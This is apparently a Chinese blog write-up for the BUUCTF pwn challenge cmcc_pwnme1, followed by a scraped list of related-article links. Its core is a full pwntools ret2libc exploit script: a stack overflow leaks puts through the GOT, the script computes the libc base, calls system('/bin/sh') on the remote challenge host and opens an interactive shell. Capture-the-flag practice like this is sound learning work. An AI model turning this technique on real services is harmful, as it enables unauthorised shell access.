cmcc_pwnme1
2024-04-25 17:07:00
cmcc_pwnme1
查看保护
直接ret2libc吧。
from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 27421)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']r.sendlineafter('>> 6. Exit ', '5')
p1 = b'a' * (0xa4 + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p1)puts_addr = u32(r.recvuntil('\xf7')[-4:].ljust(4, b'\x00'))
success('puts_addr = ' + hex(puts_addr))libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()r.sendlineafter('>> 6. Exit ', '5')
p2 = b'a' * (0xa4 + 4) + p32(system_addr) + p32(0) + p32(bin_sh)
r.sendline(p2)r.interactive()
cmcc_pwnme1相关推荐
- [BUUCTF-pwn]——cmcc_pwnme1
[BUUCTF-pwn]--cmcc_pwnme1 题目地址:https://buuoj.cn/challenges#cmcc_pwnme1 先checksec一下,什么保护都没有开,嘶 在IDA中 ...
- PWN-PRACTICE-BUUCTF-24
PWN-PRACTICE-BUUCTF-24 cmcc_pwnme1 wdb2018_guess oneshot_tjctf_2016 gyctf_2020_force cmcc_pwnme1 栈溢出 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
最新文章
- Selenium 1.0的历史及工作原理
- 后端好书阅读与推荐(续六)
- 20145129 课程总结
- 【转】文本格式导入物料凭证模板
- jquery 重写 html5 验证,Jquery前端滑动验证方式功能实现
- gitlens突然不显示了_损失百万!预防LED显示屏火灾隐患,从三方面入手
- python循环写入csv文件_Python3.5想把抓到的股票信息以循环方式存入到csv文件中怎么做...
- java 扑克牌排序_java 怎么写compareto方法实现扑克牌排序
- mysql单源多表同步单库单表_MySQL主从复制单表或者多表
- Linux嵌入式入门
- 经典面试题:用typeof来判断对象的潜在陷阱
- xshell 4无法保存新建session
- GB50311-2016标准综合布线
- linux 卸载oracle库,Linux下完美卸载 Oracle
- Excel 2010 SQL应用078 DATEPART函数与TRANSFROM函数
- Python-Opencv 基本操作(三)
- html 定义列表dddt,一个微服务+DDD(领域驱动设计)的代码结构示例
- 飞思卡尔MC9S12系列单片机地址影射以及分页问题
- 仿QQ聊天程序(java)
- 武理计算机专业物联网怎么样,计算机物联网专业怎么样呢?